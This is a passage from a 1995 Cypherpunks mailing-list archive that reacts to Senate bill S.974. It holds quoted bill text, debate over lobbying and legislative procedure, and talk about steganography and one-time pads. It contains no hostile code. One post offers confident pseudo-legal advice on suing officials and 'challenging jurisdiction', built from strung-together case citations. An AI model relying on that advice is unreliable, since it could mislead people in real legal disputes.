>>   ''(d) It shall be unlawful for any person-
>>
>>   ''(1) to use any computer or computer network in furtherance of a
>>racketeering activity (as defined in section 1961(1)); or
>>
>>   ''(2) to damage or threaten to damage electronically or digitally stored
>>data.''.
>>
>>   (c) Criminal Penalties .-Section 1963(b) of title 18, United States
>>Code, is
>>amended-
>>
>>   (1) by striking ''and'' at the end of paragraph (1);
>>
>>   (2) by striking the period at the end of paragraph (2) and inserting '';
>>and''; and
>>
>>   (3) by adding at the end the following new paragraph:
>>
>>   ''(3) electronically or digitally stored data.''.
>>
>>   (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is
>>amended by striking ''his property or business''.   [*S9181]
>>
>>   (e) Use as Evidence of Intercepted Wire or Oral Communications
>>.-Section 2515
>>of title 18, United States Code, is amended by inserting before the period at
>>the end the following: '', unless the authority in possession of the
>>intercepted
>>communication attempted in good faith to comply with this chapter. If the
>>United
>>States or any State of the United States, or subdivision thereof, possesses a
>>communication intercepted by a nongovernmental actor, without the knowledge of
>>the United States, that State, or that subdivision, the communication may be
>>introduced into evidence''.
>>
>>   (f) Authorization for Interception of Wire, Oral, or Electronic
>>Communications .-Section 2516(1) of title 18, United States Code, is amended-
>>
>>   (1) by striking ''and'' at the end of paragraph (n);
>>
>>   (2) by striking the period at the end of paragraph () and inserting '';
>>and''; and
>>
>>   (3) by adding at the end the following new paragraph:
>>
>>   ''(p) any violation of section 1962 of title 18.''.
>>
>>   (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United
>>States Code, is amended by inserting before the semicolon the following: ''to
>>the extent feasible''.
>>
>>   (h) Computer Crimes .-
>>
>>   (1) New prohibited activities .-Chapter 47 of title 18, United States Code,
>>is amended by adding at the end the following new section:
>>
>>   ''Sec. 1030A. Racketeering-related crimes involving computers
>>
>>   ''(a) It shall be unlawful-
>>
>>   ''(1) to use a computer or computer network to transfer unlicensed computer
>>software, regardless of whether the transfer is performed for economic
>>consideration;
>>
>>   ''(2) to distribute computer software that encodes or encrypts
>>electronic or
>>digital communications to computer networks that the person distributing the
>>software knows or reasonably should know, is accessible to foreign
>>nationals and
>>foreign governments, regardless of whether such software has been
>>designated as
>>nonexportable; and
>>
>>   ''(3) to use a computer or computer network to transmit a communication
>>intended to conceal or hide the origin of money or other assets, tangible or
>>intangible, that were derived from racketeering activity; and
>>
>>   ''(4) to operate a computer or computer network primarily to facilitate
>>racketeering activity or primarily to engage in conduct prohibited by
>>Federal or
>>State law.
>>
>>   ''(b) For purposes of this section, each act of distributing software is
>>considered a separate predicate act. Each instance in which nonexportable
>>software is accessed by a foreign government, an agent of a foreign
>>government,
>>a foreign national, or an agent of a foreign national, shall be
>>considered as a
>>separate predicate act.
>>
>>   ''(c) It shall be an affirmative defense to prosecution under this section
>>that the software at issue used a universal decoding device or program
>>that was
>>provided to the Department of Justice prior to the distribution.''.
>>
>>   (2) Clerical amendment .-The analysis at the beginning of chapter 47,
>>United
>>States Code, is amended by adding at the end the following new item:
>>
>>   ''1030A. Racketeering-related crimes involving computers.''.
>>
>>   (3) Jurisdiction and venue .-Section 1030 of title 18, United States
>>Code, is
>>amended by adding at the end the following new subsection:
>>
>>   ''(g)(1)(A) Any act prohibited by this section that is committed using any
>>computer, computer facility, or computer network that is physically located
>>within the territorial jurisdiction of the United States shall be deemed
>>to have
>>been committed within the territorial jurisdiction of the United States.
>>
>>   ''(B) Any action taken in furtherance of an act described in
>>subparagraph (A)
>>shall be deemed to have been committed in the territorial jurisdiction of the
>>United States.
>>
>>   ''(2) In any prosecution under this section involving acts deemed to be
>>committed within the territorial jurisdiction of the United States under this
>>subsection, venue shall be proper where the computer, computer facility, or
>>computer network was physically situated at the time at least one of the
>>wrongful acts was committed.''.
>>
>>   (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code,
>>is amended by striking ''or television communication'' and inserting
>>''television communication, or computer network or facility''.
>>
>>   (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of
>>1980 (42 U.S.C. 2000aa) is amended-
>>
>>   (1) in subsection (a)-
>>
>>   (A) by striking ''or'' at the end of paragraph (1);
>>
>>   (B) by striking the period at the end of paragraph (2) and inserting '';
>>or''; and
>>
>>   (C) by adding at the end the following new paragraph:
>>
>>   ''(3) there is reason to believe that the immediate seizure of such
>>materials
>>is necessary to prevent the destruction or altercation of such
>>documents.''; and
>>
>>   (2) in subsection (b)-
>>
>>   (A) by striking ''or'' at the end of paragraph (3);
>>
>>   (B) by striking the period at the end of paragraph (4) and inserting '';
>>or''; and
>>
>>   (C) by adding at the end the following new paragraph:
>>
>>   ''(5) in the case of electronically stored data, the seizure is
>>incidental to
>>an otherwise valid seizure, and the government officer or employee-
>>
>>   ''(A) was not aware that work product material was among the data seized;
>>
>>   ''(B) upon actual discovery of the existence of work product materials, the
>>government officer or employee took reasonable steps to protect the privacy
>>interests recognized by this section, including-
>>
>>   ''(i) using utility software to seek and identify electronically
>>stored data
>>that may be commingled or combined with non-work product material; and
>>
>>   ''(ii) upon actual identification of such material, taking reasonable steps
>>to protect the privacy of the material, including seeking a search
>>warrant.''.
>
>Eric Barnes - TheRogue@dnai.com
>PO Box 27507, San Francisco, CA 94127
>Corporate Spokesman, Specialist in "Attack Public
>Relations", Unique Marketing Solutions.
>"You have to give up the life you planned, to find
>the one that's waiting for you." - Sally Field

Eric Barnes - TheRogue@dnai.com
PO Box 27507, San Francisco, CA 94127
Corporate Spokesman, Specialist in "Attack Public
Relations", Unique Marketing Solutions.
"You have to give up the life you planned, to find
the one that's waiting for you." - Sally Field






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:24:19 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
In-Reply-To: <ac2af3ed010210041c19@[205.199.118.202]>
Message-ID: <9507140224.AA13439@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone says:
> By causing us to go into paroxysms of activity every time they throw a new
> piece of legislation over the transom, we dissipate our efforts in more
> promising areas.

Er, heh?

1) 95% of the people on this list write no code and participate in no
   design activities, so they have no efforts to dissipate.
2) If there was a lobbying effort, the most participation anyone in
   the "we" above would end up doing is throwing cash at some
   Washington firm. I doubt that anyone would be involved directly, so
   how does this "dissipate our efforts"?
3) What you mean "we", kimosabe?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 19:27:17 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507140224.WAA05123@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507140151.UAA01504@arnet.arn.net>, merriman@arn.net (David
K. Merriman) wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>While I respect the ideas and opinions submitted by the majority of the
>members of this list, I wonder if perhaps we're failing to deal with the
>_root_ problem of such things as the CDA, Clipper, DTA, etc.
>
>Specifically, I wonder if it wouldn't be a better approach to *prevent* such
>measures from ever being proposed in the first place.

Short of a 50 kilo ton bomb on Washington, I don't see any way that could
be accomplished.
<No, I don't advocate nuking DC.>

>Is there any precedence or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?

You can't sue the government without its prior consent. Government
officials are also usually immune from being sued over their official
actions.

>It would seem that things such as the CDA, etc, are patent violations of the
>Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
>measures be violating our civil rights, and thus be criminally liable?
>Aren't Congressrodents supposed to take an Oath of Office that involves
>upholding the Constitution?

The oath is not meant to be kept. Its sole purpose is to provide a photo
op for the incoming congresscritters.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAXVPioZzwIn1bdtAQFp5gF/WnEoNO15G11gXi9G/BmtFzu/toHZPBmj
ldONnU+mbB5c9LIGeJH3usQZLdT/D4Sw
=NpN9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 19:27:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: co-sponsors S.974
In-Reply-To: <199507140100.VAA00681@pipe4.nyc.pipeline.com>
Message-ID: <9507140227.AA13589@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Shari Steele writes, re: S.974, the Anti-Electronic Racketeering Act 
[via gnu, on the cypherpunks list]:
# Fortunately, the bill does not have a very promising
# future.  The bill has  no co-sponsors.  

James R. Coleman (or John Noble ?  screwed up attributions) writes
[via jya, on cyberia-l]:
> The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy
> (D-VT). It has the enthusiastic support of the
> administration. In a DOJ press release  following its
> introduction, AG Reno is quoted as saying "computer crime
> is fast becoming everyone's problem. I'm encouraged that
> this bill is off to a  bipartisan start, and I hope
> Congress will move quickly to enact it." 

I think I can settle the confusion about who's sponsoring what in the Senate. 

The bill described by Coleman ? Noble ?
on cyberia-l appears to be S.982, the National Information Infrastructure 
Protection Act of 1995. According to Thomas (http://thomas.loc.gov), this bill
was introduced in the Senate on June 29th (not 27th), and is cosponsored by,
you guessed it, Sens. Kyl, Leahy, & Grassley. It mainly consists of a
section entitled "Computer Crime", which sets penalties for breaking into
systems, "damaging" data, systems, etc., ad nauseam.

(This is why they give bills *numbers*, folks :)

Here's an excerpt from Sen Leahy's introductory remarks for S.982 in the
Congressional Record: 
 --- begin excerpts ---
[...]
This bill will increase protection
for both government and private computers, and the information
on those computers, from the growing threat of computer crime.

We increasingly depend on the availability, integrity, and
confidentiality of computer systems and information to conduct our
business, communicate with our friends and families, and even to
be entertained.
[...]
Second, the bill would increase protection for the privacy and
confidentiality of computer information. Recently, computer hackers
have accessed sensitive data regarding Operation Desert
Storm, penetrated NASA computers, and broken into Federal
courthouse computer systems containing confidential records. Others
have abused their privileges on Government computers by snooping
through confidential tax returns, or selling confidential criminal
history information from the National Crime Information Center.

The bill would criminalize these activities by making all those who
misuse computers to obtain Government information and, where
appropriate, information held by the private sector, subject to
prosecution.
[...]
 --- end excerpts ---

I seem to recall reading that non-subscribers can't post to cyberia-l. Feel
free to forward this there, if a similar correction hasn't already 
appeared. 

 -L. Futplex McCarthy <lmccarth@cs.umass.edu>	PGP key by finger or server

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXVuWf7YYibNzjpAQFTQAQAhRnHxtnQ0wcIOEzO+HDgYTr8R4qBzg/h
3UL9gQYWSkGDkhCqR7k31P1Mla7aj5kRHjMg0g7Xgyi2Ag6W89jtc1E4NKj2SP9a
4vlx5qtT0lMtNIRTlUBA5p76qS+EElFAXmbAwjOgH3EJzGRymKF/vE/Unek0M/QS
iI32DT+RN2w=
=hbAd
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:29:39 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: def'n of "computer network"
In-Reply-To: <9507132338.AA07522@toad.com>
Message-ID: <9507140229.AA13447@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
> Perry, I don't understand.  If the least significant bits in my gif file
> follow all the "known statistical distributions", how can anyone know 
> whether they are "just noise" or are an encrypted message,

Indeed -- how could the recipient even know to look, unless these
things arrived regularly and with a fully standardized form of
steganography, in which case why bother, all you've done is come up
with a very odd form of transfer encoding.

If the recipient does know to look, that implies either that there is
a hint, in which case the steganography is useless, or it implies that
you have prearrangement, in which case my comments on prearrangement
hold.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 20:37:17 PDT
To: cypherpunks@toad.com
Subject: Legislation question...
Message-ID: <199507140331.AA07147@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I may be a bit behind the times, but I have a question
about the "ban crypto-anarchy" legislation as well as
the Exon amendment:

Isn't legislation in this country supposed to start in the
House and _then_ move to the Senate for approval?

Why are all of these bills going in the opposite direction?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:36:47 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: OTP server..
In-Reply-To: <199507132346.SAA07316@netman.eng.auburn.edu>
Message-ID: <9507140235.AA13456@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> How about WWW one time pad servers? You browse to your
> favorite OTP server, which has a random number generator
> running in the background. You tell it to give you a block
> of X bytes, and mail it to persons 1, 2, 3, ... N.

Do I get you wrong, or are you proposing the mailing of one time pads
in the clear?

> Enough of these things would be REALLY tough to monitor...

The NSA is willing to monitor virtually all international
telecommunications traffic and try to figure out what's interesting. I
doubt this poses much of a challenge to them. Not to mention the fact
that it probably wouldn't pose much of a challenge to *me* given a set
of wiretaps and I have virtually no resources...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Thu, 13 Jul 95 19:36:42 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: co-sponsors
In-Reply-To: <v02120d1cac2aaebb8090@[199.2.22.120]>
Message-ID: <199507140235.WAA21027@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:53:08 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <9507140252.AA13485@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



David K. Merriman writes:
> Specifically, I wonder if it wouldn't be a better approach to *prevent* such
> measures from ever being proposed in the first place.
> 
> Is there any precedence or possibility of either filing civil or criminal
> charges against a Government official for their _official_ actions?

Not only is it a bad idea politically, but in fact members of congress
are made specifically immune by the constitution from any legal action
being taken against them for their words or actions during sessions of
congress by any body other than congress.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 19:58:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <9507131857.AA12796@snark.imsi.com>
Message-ID: <9507140257.AA13867@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Perry,
> 
> I have all I'm going to take of your acerbic rudeness to me.
> 
> I will no longer be responding to any of your messages.
> 
> --Tim

<sigh>

Everybody needs to take a deep breath and count to 1,000. Seriously,
we're all feeling plenty of stress today. Various people have been
talking about getting out of the U.S. while the going's good (?), and
it doesn't sound much like hyperbole this time. It's not surprising that
we're releasing our frustration on each other, lashing out at the nearest
quasi-tangible targets.

Don't let them do this to us -- to you !  Remember, in the grand scheme
of things, we are all very definitely on the same side of Evil like
S.974. We need to pause, gather our wits a bit, and focus on some debate
and action, rather than directing our anger at each other. This is no
time for infighting, grudges, etc.

-Futplex

[if this was too touchy-feely for ya, 
 feel free to vent some steam in private email ;]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 20:01:32 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <Pine.ULT.3.91.950713205857.19725A-100000@krypton.mankato.msus.edu>
Message-ID: <9507140301.AA13498@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> On Thu, 13 Jul 1995, Perry E. Metzger wrote:
> 
> > Anyone who is saying that it is impossible to fight the legislative
> > battles hasn't been thinking. It takes millions of dollars,  but there
> > is a lot of money out there to be had in my opinion.
> 
> Nobody's saying it's impossible, what we're saying is that we don't have 
> the resources to DO that on the scale that is needed.

Since when?

> Maybe Microsoft does, but we don't.

I must admit to only having an academic knowledge of this process, but
I strongly suspect that you are incorrect -- everything I've read,
watched and learned of indicates to me that there are enough people
and companies with an interest here to raise a few million
dollars. Consider that Netscape alone is a very wealthy company that
would have its marketing plans strongly disrupted by this new piece of
congressional trash.

A few million isn't enough to destroy careers on the scale of the
NRA, but it's enough to make things very messy for people.

> What we can do, however, is to shape the culture of the net.  That
> culture will have to eventually be listened to by DC.

The beltway crowd doesn't log in. They ignored the petitions sent to
Leahy for S.314 because they didn't think of the people who sent the
petitions in as "real". I doubt they will understand the net for many
years to come, whereas we have to stall out the NSA and company now.

Incidentally, unlike the NRA, I believe our task is merely to stifle
legislation for about five years, at which point it will be too late
for legislation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 23:01:05 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <ac2b562c03021004310a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:57 AM 7/14/95, L. McCarthy wrote:
>> Perry,
>>
>> I have all I'm going to take of your acerbic rudeness to me.
>>
>> I will no longer be responding to any of your messages.
>>
>> --Tim
>
><sigh>
>
>Everybody needs to take a deep breath and count to 1,000. Seriously,
>we're all feeling plenty of stress today. Various people have been
>talking about getting out of the U.S. while the going's good (?), and
>it doesn't sound much like hyperbole this time. It's not surprising that
>we're releasing our frustration on each other, lashing out at the nearest
>quasi-tangible targets.

Note that I didn't post that to the list.

Your requoting it, without the intermediate quoting of the person who _did_
post it to the list, makes it appear I was spewing this garbage to the
list, when I wasn't.

I don't care for your pop psychology. I would've followed your advice and
left these comments in e-mail only, had you done the same.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Thu, 13 Jul 95 20:09:45 PDT
To: hayden@krypton.mankato.msus.edu (Robert A. Hayden)
Subject: Suing/Reputations (was: Root Causes)
In-Reply-To: <Pine.ULT.3.91.950713211304.19919A-100000@krypton.mankato.msus.edu>
Message-ID: <199507140314.XAA05815@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



Robert A. Hayden writes:

> If I understand, you can't sue the government for just trying to pass a
> law, or for even passing it.  What has to happen is that somebody needs 
> to be arrested and charged with breaking the law before you can challenge 
> them.

Correct, insofar as American jurisprudence is concerned (and a big hello
to all our friends in the rest of the world!).

A few citations, hopefully relevant:

"States and state officials acting officially are held not to be
'persons' subject to liability under 42 USCS section 1983." Wills v.
Michigan Dept. of State Police, 105 L.Ed. 2nd 45 (1989).

Title 42 of the United States Code is the section that describes
the process by which one may sue a government official. However:

"...an officer may be held liable in damages to any person injured in
consequence of a breach of any of the duties connected with his
office...The liability for nonfeasance, misfeasance, and for malfeasance
in office is in his 'individual', not his official capacity..." 70
AmJur2nd Sec. 50, VII Civil Liability.

So the trick is to sue the offender as an individual, and not as a
government official.

"A  plaintiff  who  seeks  damages for  violation  of  constitutional or
statutory   rights  may  overcome  the  defendant  official's  qualified
immunity  only by showing that those  rights were clearly established at
the time of the conduct at issue." Davis v. Scherer, 82 L.Ed.2d 139,151.
 
In summary: Failure to object timely is fatal. You must immediately let
someone know when they are violating your rights, and what the possible
penalties are, and give them the opportunity to stop, and be able to show
as evidence that they continued their actions despite your clear warning
of the consequences.

     Title 42 USC §1983:
 
     "Every   person  who,  under  color   of  any  statute,  ordinance,
regulation, custom, or usage, of any State or territory, or the District
of  Columbia, subjects,  or causes to  be subjected, any  citizen of the
United  States, or other person within  the jurisdiction thereof, to the
deprivation  of  any rights,  privileges, or  immunities secured  by the
Constitution  and laws,   shall  be liable  to the  party injured  in an
action at law, suit in equity or other proper proceedings for redress."

Notice that this statute recognizes that "statutes, ordinances, regulations
and customs" can violate your rights. Where they do so, it's up to you to
challenge the law's jurisdiction over you. Failure to challenge jurisdiction
at the first instance of a rights violation can be fatal to your case, and
will be seen as an admission that the law in question does indeed have lawful
jurisdiction over you.

     "To  maintain an action under  42 USC 1983, it  is not necessary to
allege or prove that the defendants intended to deprive plaintiff of his
Constitutional  rights or that they acted willfully, purposefully, or in
a  furtherance of a conspiracy.  . . it is  sufficient to establish that
the  deprivation. . . was the  natural consequences of defendants acting
under  color of law. . .  ."  Ethridge v. Rhodos,  DC Ohio 268 F Supp 83
(1967), Whirl v. Kern CA 5 Texas 407 F 2d 781 (1968)

     Further, United States Code, Title 18, section 242 provides for "one
or more persons who, under color of law, statute, ordinance, regulation,
or custom, willfully subjects any inhabitant of any state, territory, or
district to the deprivation of rights, privileges, or immunities secured
or protected by the Constitution or laws of the United States. . . shall
be  fined not more than  $1,000 or imprisoned not  more than one year or
both." This means you can sue for conspiracy if there's more than one
person involved, such as a magistrate acting in collusion with a police
officer. And you are able to sue them as individuals because:

"...an...officer who acts in violation of the Constitution ceases to
represent the government." Brookfield Co. v Stuart, (1964) 234 F. Supp
94, 99 (U.S.D.C., Wash.D.C.)


On a more relevant note:

> Although publishing an "Enemies of the Constitution" list all over the 
> net, listing which congress-critters opposed the constitution (suck as 
> Exon) might be interesting.  Might even make a good web project.  *ponders*

Well, the Internet Advertisers Blacklist seems to be doing pretty well,
despite the obvious backlash by the likes of Marthe Siegel. The Idea
Futures market also seems to be doing a hot business. The recent focus
here on 'moderated' areas and whether the signal-to-noise ratio is worth
the added layer of 'authority' shows the need for individual choice.
I may choose to have person A forward me Cypherpunks excerpts, person B
specific rec.toys.lego postings, etc. Or I can use software (getting
better all the time) to act as an intelligent agent and find articles
for me. Or most likely, I'll use a combination of the two, and I suspect
most folks will choose this as well when they are made aware of the
respective advantages and disadvantages of each method.

In sum, "reputation markets" as Tim described are just starting to take
off. The need for strong security tools increases with it. What if some
big-name megacorp put up a page with all kinds of financial transaction
options - and suffered a mass boycott because they refused to use PGP?
If someone feels like creating an "Enemies of the Constitution" list, I'd
certainly be interested; even more so if there were competitors doing
similar projects.
  
Folks may think the pot's boiling now, but remember: We're the frogs
who, at the very least, know what's coming, even if we aren't able to
jump completely out. "Forewarned is forearmed." Every time government
does something stupid and outrageous, they piss off a few more people.
Mass disobedience (preferably nonviolent) will become more common, and
this is definitely a Good Thing.

(Blatant plug: My home page has links to both the Net Advertisers Blacklist
and the Idea Futures page, along with lots of other things. It's at:

http://yakko.cs.wmich.edu/~frogfarm

All constructive comments are welcomed.)


-- 

 frogfarm@yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY
    imschira@nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy
             Damaged Justice | through Complex Mathematics! God's law PREVENTS
Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:31:57 PDT
To: Kevin Stumborg <cypherpunks@toad.com
Subject: Re:
Message-ID: <199507140628.XAA21517@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 PM 7/13/95 -700, Kevin Stumborg wrote:
>send me mail

Here's some!


You might try sending mail to cypherpunks-request@toad.com
(or majordomo@toad.com) with a one-line message body saying
        help
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:33:00 PDT
To: Ray Arachelian <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507140629.XAA21600@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:53 PM 7/13/95 -0400, Ray Arachelian wrote:
>> Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
>> Anti-electronic Racketeering Act of 1995. This bill makes important changes
>> to RICO and criminalizes deliberately using computer technology to engage in
>> criminal activity. I believe this bill is a reasonable, measured and strong
>> response to a growing problem. According to the computer emergency and
>> response team at Carnegie-Mellon University, during 1994, about 40,000
>> computer users were attacked. Virus hacker, the FBI's national computer
>> crime squad has investigated over 200 cases since 1991. So, computer crime is
>> clearly on the rise.
>
>Eh, what do "virus hackers" have to do with encryption, why is it these 
>morons justify the destruction of encryption by mentioning hackers and 
>viruses?

You're parsing the title wrong.  It's an act to support racketeering
through opposition to electronic communications.  What viruses have to
do with encryption is that encryption makes it easier to prevent viruses,
and Senator Grassley wants to stop that.  And the term "strong" was used in its
correct engineering meaning, as in "It's a vessel of fertilizer which is
very strong and promotes growth".


>> Mr. President, I suppose that some of this is just natural. Whenever man
>> develops a new technology, that technology will be abused by some. And that
>> is why I have introduced this bill. 

Yup.  Quite so.

>> Computer fraud accounts for the loss of millions of dollars per year. And
>> often times, there is little that can be done about this because the computer
>> used to commit the crimes is located overseas. So, under my bill, overseas
>> computer users who employ their computers to commit fraud in the United
>> States would be fully subject to the Federal criminal laws. 

Hey, Julf, we've got your number!  And we're making sure nobody's got any
encryption to prevent fraud with.

>> Mr. President, this brave new world of electronic communications and global
>> computer networks holds much promise. But like almost anything, there is the
>> potential for abuse and harm. That is why I urge my colleagues to support
>> this bill and that is why I urge industry to support this bill.

As above.

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 13 Jul 95 20:34:21 PDT
To: cypherpunks@toad.com
Subject: Re: who knows about Security First Network Bank
Message-ID: <v02120d01ac2b962a9373@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: blanneau@pic.net
>Mime-Version: 1.0
>Date: Thu, 13 Jul 1995 17:04:41 -0500
>To: MINITERS@Citadel.edu
>From: blanneau@bilbo.pic.net (Bazile R. Lanneau, Jr.)
>Subject: Re: who knows about Security First Network Bank
>Cc: www-buyinfo@allegra.att.com
>
>Are you trying to find it?  http://www.sfnb.com
>Neat site!
>
>------------------------------------------
>Bazile Lanneau
>Britton & Koontz First National Bank
>Natchez, MS  39120
>601-445-5576
>blanneau@pic.net
>blanneau@bkbank.com (Soon)
>
>
>>>Date: Thu, 13 Jul 1995 13:32:04 -0400 (EDT)
>>>From: Syl Miniter 803-768-3759 <MINITERS@Citadel.edu>
>>>Subject: who knows about Security First Network Bank
>>>To: cypherpunks@toad.com
>>>Cc: MINITERS@Citadel.edu
>>>Mime-Version: 1.0
>>>Sender: owner-cypherpunks@toad.com
>>>Precedence: bulk
>>>
>>>There is an extensive article in the July issue of "Bank Technology News
>>>about
>>>a startup Internet bank by the name above.
>>>Does anyone know about this outfit.
>>>
>>
>>-----------------
>>Robert Hettinga (rah@shipwright.com)
>>Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
>>USA (617) 323-7923
>>"Reality is not optional." --Thomas Sowell
>>>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
>>
>>
>>
>>
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 13 Jul 95 20:36:04 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Eudora MacPGP Woes
Message-ID: <v02120d09ac2b91d84fcc@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:40 7/8/95, Black Unicorn wrote:
>I have noticed that an X-Attachement: header is added, but I have no idea
>how to remove it without opening the Eudora outbox with teachtext or
>something.

Highlight the file name on the attachments line and hit delete to remove an
attached file request.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 20:43:28 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <9507140342.AA13574@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Fraering writes:
> I may be a bit behind the times, but I have a question
> about the "ban crypto-anarchy" legislation as well as
> the Exon amendment:
> 
> Isn't legislation in this country supposed to start in the
> House and _then_ move to the Senate for approval?
> 
> Why are all of these bills going in the opposite direction?

Legislation can originate in either house. The constitution says only
that 

"All bills for raising revenue shall originate in the House of 
Representatives; but the Senate may propose or concur with 
amendments as on other bills."

This particular rule is often breached in reality, by the way, but
